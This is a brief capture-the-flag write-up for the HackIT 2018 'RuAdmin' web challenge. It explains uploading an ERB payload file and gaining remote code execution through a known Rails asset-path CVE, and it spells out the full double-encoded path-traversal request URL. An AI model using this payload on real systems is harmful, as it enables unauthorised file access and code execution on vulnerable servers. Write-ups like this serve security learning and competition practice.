DefConUA/HackIT2018/web/RuAdmin/README.md

 Basically you need to upload an erb file containing your payload and abuse the CVE to get RCE :
 The payload for rce looks like : http://185.168.131.128:8080/assets/file:%2f%2f/home/web03/app/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252E%252E/%252E%252E/home/web03/app/uploads/resumes/someHash/file.erb%3Ftype=text/plain
 For more details about the CVE , check Orange Tsai talk at BHUSA 2018.
+Note: The application was on production mode but flag assets.compile was on.